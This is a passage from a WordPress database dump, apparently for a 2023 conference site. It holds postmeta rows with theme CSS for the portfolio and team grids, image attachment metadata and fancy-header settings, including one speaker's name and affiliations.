.dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-362ee46291fe96504ecc86468d076895.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n}\n@media screen and (max-width: 991px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-362ee46291fe96504ecc86468d076895.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-362ee46291fe96504ecc86468d076895.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-362ee46291fe96504ecc86468d076895.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n}\n@media screen and (max-width: 767px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-362ee46291fe96504ecc86468d076895.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-362ee46291fe96504ecc86468d076895.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-362ee46291fe96504ecc86468d076895.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n}\n\";s:32:\"d4f3d29c475ebf97cf26d99ef9e65ce5\";s:12869:\".portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.classic-layout-list article {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article {\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article:first-of-type {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .post-entry-content {\n  width: calc(100% - );\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .no-img .post-entry-content {\n  width: 100%;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.hover-scale article:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list article {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n  padding: 20px 20px 0px 20px;\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap *,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-rollover:after {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.enable-bg-rollover .post-thumbnail-rollover:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.bottom-overlap-layout-list.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container {\n  height: calc(100% - 100px);\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  width: 44px;\n  height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  margin: 10px 5px 10px;\n}\n.content-rollover-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a,\n.gradient-overlay-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  margin: 10px 10px 10px 0;\n}\n.dt-icon-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-hover-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  background: rgba(255,255,255,0.3);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.dt-icon-hover-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  background: rgba(255,255,255,0.5);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span:before {\n  font-size: 16px;\n  line-height: 44px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:not(:hover) > span {\n  color: #ffffff;\n}\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span,\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.dt-icon-hover-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.owl-carousel .entry-title {\n  margin-bottom: 5px;\n  font-size: 22px;\n  line-height: 32px;\n  font-weight: bold;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .portfolio-categories {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n  margin-bottom: 5px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list) .post-entry-content {\n  padding: 20px 30px 30px 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list):not(.content-bg-on):not(.mode-list) .no-img .post-entry-content {\n  padding: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on:not(.classic-layout-list):not(.centered-layout-list):not(.gradient-overlay-layout-list) .post-entry-content {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list .post-entry-content {\n  border-radius: 0px;\n}\n@media screen and (max-width: ) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 article {\n    -webkit-flex-flow: column nowrap;\n    -moz-flex-flow: column nowrap;\n    -ms-flex-flow: column nowrap;\n    flex-flow: column nowrap;\n    margin-top: 20px;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on article {\n    border: none;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.centered-layout-list article {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    width: 100%;\n    margin: 0;\n    top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content:after {\n    display: none;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-even .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-thumbnail-wrap {\n    -webkit-order: 0;\n    -moz-order: 0;\n    -ms-flex-order: 0;\n    order: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-title-content {\n    -webkit-order: 1;\n    -moz-order: 1;\n    -ms-flex-order: 1;\n    order: 1;\n    width: 100%;\n    padding: 20px 20px 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-content {\n    -webkit-order: 2;\n    -moz-order: 2;\n    -ms-flex-order: 2;\n    order: 2;\n    padding-top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    padding: 20px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title {\n    margin: 3px 0 5px;\n    font-size: 20px;\n    line-height: 26px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n    margin: 5px 0 5px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n    margin: 15px 0 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details {\n    margin: 5px 0 10px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details.details-type-link {\n    margin-bottom: 2px;\n  }\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n  width: calc(33.333333333333%) * 2;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width:not(.centered-layout-list):not(.content-bg-on) .dt-css-grid {\n  grid-row-gap: 0px;\n}\n@media screen and (max-width: 1199px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(33.333333333333%)*2;\n  }\n}\n@media screen and (max-width: 991px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(50%)*2;\n  }\n}\n@media screen and (max-width: 767px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n    grid-column: span 1;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(100%)*2;\n  }\n}\n\";}'),
(15165,2856,'_edit_lock','1675606583:1'),
(15166,2857,'_wp_attached_file','2022/10/m2-3.jpg'),
(15167,2857,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:624;s:6:\"height\";i:387;s:4:\"file\";s:16:\"2022/10/m2-3.jpg\";s:8:\"filesize\";i:214846;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"m2-3-300x186.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:186;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15346;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"m2-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7582;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15168,2856,'_edit_last','1'),
(15169,2856,'_wpb_vc_js_status','true'),
(15170,2856,'_dt_sidebar_position','disabled'),
(15171,2856,'_dt_sidebar_widgetarea_id','sidebar_1'),
(15172,2856,'_dt_sidebar_hide_on_mobile','0'),
(15173,2856,'_dt_footer_show','1'),
(15174,2856,'_dt_footer_widgetarea_id','sidebar_2'),
(15175,2856,'_dt_footer_hide_on_mobile','0'),
(15176,2856,'_dt_header_title','fancy'),
(15177,2856,'_dt_header_background','normal'),
(15178,2856,'_dt_header_background_below_slideshow','disabled'),
(15179,2856,'_dt_header_transparent_bg_color_scheme','light'),
(15180,2856,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(15181,2856,'_dt_header_transparent_top_bar_bg_opacity','25'),
(15182,2856,'_dt_header_transparent_bg_color','#000000'),
(15183,2856,'_dt_header_transparent_bg_opacity','50'),
(15184,2856,'_dt_header_disabled_background','normal'),
(15185,2856,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(15186,2856,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(15187,2856,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(15188,2856,'_dt_header_disabled_transparent_bg_color','#000000'),
(15189,2856,'_dt_header_disabled_transparent_bg_opacity','50'),
(15190,2856,'_dt_page_overrides_top_margin',''),
(15191,2856,'_dt_page_overrides_right_margin',''),
(15192,2856,'_dt_page_overrides_bottom_margin',''),
(15193,2856,'_dt_page_overrides_left_margin',''),
(15194,2856,'_dt_mobile_page_padding_top',''),
(15195,2856,'_dt_mobile_page_padding_right',''),
(15196,2856,'_dt_mobile_page_padding_bottom',''),
(15197,2856,'_dt_mobile_page_padding_left',''),
(15198,2856,'_dt_fancy_header_layout_heading',''),
(15199,2856,'_dt_fancy_header_title_aligment','center'),
(15200,2856,'_dt_fancy_header_height','300'),
(15201,2856,'_dt_fancy_header_padding-top','0px'),
(15202,2856,'_dt_fancy_header_padding-bottom','0px'),
(15203,2856,'_dt_fancy_header_breadcrumbs_heading',''),
(15204,2856,'_dt_fancy_header_breadcrumbs','disabled'),
(15205,2856,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(15206,2856,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(15207,2856,'_dt_fancy_header_title_heading',''),
(15208,2856,'_dt_fancy_header_title_mode','custom'),
(15209,2856,'_dt_fancy_header_title',''),
(15210,2856,'_dt_fancy_header_title_font_size','30'),
(15211,2856,'_dt_fancy_header_title_line_height','36'),
(15212,2856,'_dt_fancy_header_text_transform','none'),
(15213,2856,'_dt_fancy_header_title_color_mode','color'),
(15214,2856,'_dt_fancy_header_title_color','#ffffff'),
(15215,2856,'_dt_fancy_header_subtitle_heading',''),
(15216,2856,'_dt_fancy_header_subtitle',''),
(15217,2856,'_dt_fancy_header_subtitle_font_size','18'),
(15218,2856,'_dt_fancy_header_subtitle_line_height','26'),
(15219,2856,'_dt_fancy_header_subtitle_text_transform','none'),
(15220,2856,'_dt_fancy_header_subtitle_color_mode','color'),
(15221,2856,'_dt_fancy_header_subtitle_color','#ffffff'),
(15222,2856,'_dt_fancy_header_bg_heading',''),
(15223,2856,'_dt_fancy_header_bg_color','#222222'),
(15224,2856,'_dt_fancy_header_bg_image_origin','custom'),
(15225,2856,'_dt_fancy_header_bg_image','a:1:{i:0;i:2860;}'),
(15226,2856,'_dt_fancy_header_bg_repeat','no-repeat'),
(15227,2856,'_dt_fancy_header_bg_position_x','center'),
(15228,2856,'_dt_fancy_header_bg_position_y','center'),
(15229,2856,'_dt_fancy_header_bg_fullscreen','1'),
(15230,2856,'_dt_fancy_header_bg_overlay','0'),
(15231,2856,'_dt_fancy_header_overlay_color','#000'),
(15232,2856,'_dt_fancy_header_bg_overlay_opacity','50'),
(15233,2856,'_dt_fancy_header_scroll_effect','default'),
(15234,2856,'_dt_fancy_header_bg_parallax','0.5'),
(15235,2856,'_dt_fancy_header_responsiveness_heading',''),
(15236,2856,'_dt_fancy_header_responsiveness','enabled'),
(15237,2856,'_dt_fancy_header_responsiveness_switch','778px'),
(15238,2856,'_dt_fancy_header_responsive_height','70'),
(15239,2856,'_dt_fancy_header_responsive_font_size','30'),
(15240,2856,'_dt_fancy_header_responsive_title_line_height','38'),
(15241,2856,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(15242,2856,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(15243,2856,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(15244,2856,'_dt_project_options_back_button',''),
(15245,2856,'_dt_project_options_show_link',''),
(15246,2856,'_dt_project_options_link',''),
(15247,2856,'_dt_project_options_link_target',''),
(15248,2856,'_dt_project_options_link_name',''),
(15249,2856,'_dt_project_options_hide_thumbnail','1'),
(15250,2856,'_dt_project_options_open_thumbnail_in_lightbox','0'),
(15251,2856,'_dt_project_options_related_mode','same'),
(15252,2856,'_dt_project_options_preview','normal'),
(15253,2856,'the7_fancy_title_css','.fancy-header {\n  background-image: url(\'https://gsw2023.com/wp-content/uploads/2022/10/m1-3.jpg\');\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(15254,2856,'_thumbnail_id','2860'),
(15255,2860,'_wp_attached_file','2022/10/m1-3.jpg'),
(15256,2860,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:624;s:6:\"height\";i:351;s:4:\"file\";s:16:\"2022/10/m1-3.jpg\";s:8:\"filesize\";i:164068;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"m1-3-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12194;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"m1-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6097;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15257,2862,'_edit_lock','1665786958:1'),
(15258,2863,'_wp_attached_file','2022/10/w161.jpg'),
(15259,2863,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:160;s:6:\"height\";i:200;s:4:\"file\";s:16:\"2022/10/w161.jpg\";s:8:\"filesize\";i:33497;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"w161-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4727;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15260,2862,'_thumbnail_id','2863'),
(15261,2862,'_edit_last','1'),
(15262,2862,'_dt_sidebar_position','disabled'),
(15263,2862,'_dt_sidebar_widgetarea_id','sidebar_1'),
(15264,2862,'_dt_sidebar_hide_on_mobile','0'),
(15265,2862,'_dt_footer_show','1'),
(15266,2862,'_dt_footer_widgetarea_id','sidebar_2'),
(15267,2862,'_dt_footer_hide_on_mobile','0'),
(15268,2862,'_dt_header_title','fancy'),
(15269,2862,'_dt_header_background','normal'),
(15270,2862,'_dt_header_background_below_slideshow','disabled'),
(15271,2862,'_dt_header_transparent_bg_color_scheme','light'),
(15272,2862,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(15273,2862,'_dt_header_transparent_top_bar_bg_opacity','25'),
(15274,2862,'_dt_header_transparent_bg_color','#000000'),
(15275,2862,'_dt_header_transparent_bg_opacity','50'),
(15276,2862,'_dt_header_disabled_background','normal'),
(15277,2862,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(15278,2862,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(15279,2862,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(15280,2862,'_dt_header_disabled_transparent_bg_color','#000000'),
(15281,2862,'_dt_header_disabled_transparent_bg_opacity','50'),
(15282,2862,'_dt_page_overrides_top_margin',''),
(15283,2862,'_dt_page_overrides_right_margin',''),
(15284,2862,'_dt_page_overrides_bottom_margin',''),
(15285,2862,'_dt_page_overrides_left_margin',''),
(15286,2862,'_dt_mobile_page_padding_top',''),
(15287,2862,'_dt_mobile_page_padding_right',''),
(15288,2862,'_dt_mobile_page_padding_bottom',''),
(15289,2862,'_dt_mobile_page_padding_left',''),
(15290,2862,'_dt_fancy_header_layout_heading',''),
(15291,2862,'_dt_fancy_header_title_aligment','center'),
(15292,2862,'_dt_fancy_header_height','300'),
(15293,2862,'_dt_fancy_header_padding-top','0px'),
(15294,2862,'_dt_fancy_header_padding-bottom','0px'),
(15295,2862,'_dt_fancy_header_breadcrumbs_heading',''),
(15296,2862,'_dt_fancy_header_breadcrumbs','disabled'),
(15297,2862,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(15298,2862,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(15299,2862,'_dt_fancy_header_title_heading',''),
(15300,2862,'_dt_fancy_header_title_mode','custom'),
(15301,2862,'_dt_fancy_header_title','Dr. Aboelmagd Noureldin Royal Military College of Canada Queen’s University Canada'),
(15302,2862,'_dt_fancy_header_title_font_size','30'),
(15303,2862,'_dt_fancy_header_title_line_height','36'),
(15304,2862,'_dt_fancy_header_text_transform','none'),
(15305,2862,'_dt_fancy_header_title_color_mode','color'),
(15306,2862,'_dt_fancy_header_title_color','#ffffff'),
(15307,2862,'_dt_fancy_header_subtitle_heading',''),
